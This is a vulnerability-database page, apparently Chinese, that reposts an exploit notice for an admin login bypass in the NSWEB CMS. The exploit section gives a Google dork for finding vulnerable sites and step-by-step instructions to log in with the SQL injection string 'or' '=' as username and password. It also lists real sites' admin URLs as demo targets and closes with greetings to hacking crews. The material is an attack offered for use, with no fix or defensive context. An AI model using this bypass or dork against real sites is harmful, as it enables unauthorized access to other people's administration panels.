NSWEB Admin Login Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1036972 漏洞类型
发布时间 2017-07-26 更新时间 2017-07-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2017070174
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: NSWEB Admin Login Bypass
# Author : Sipahiler / TurkZ.org
# Date : 2017-07-26
# Google Dork : intext: NSWEB © Copyright 2017. All Rights Reserved
# Tested on : Kali Linux And W7
# Vendor Home : http://www.nsweb.rs/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/   

Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: 'or' '='
[+] Password: 'or' '='

Demo :
http://www.nsweb.rs/admin
http://www.nskoncept.rs/admin/

Greet'Zzz :  Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & AKA_1NF4z & Kutluhan & Alianz & Empire_Fatih & S1R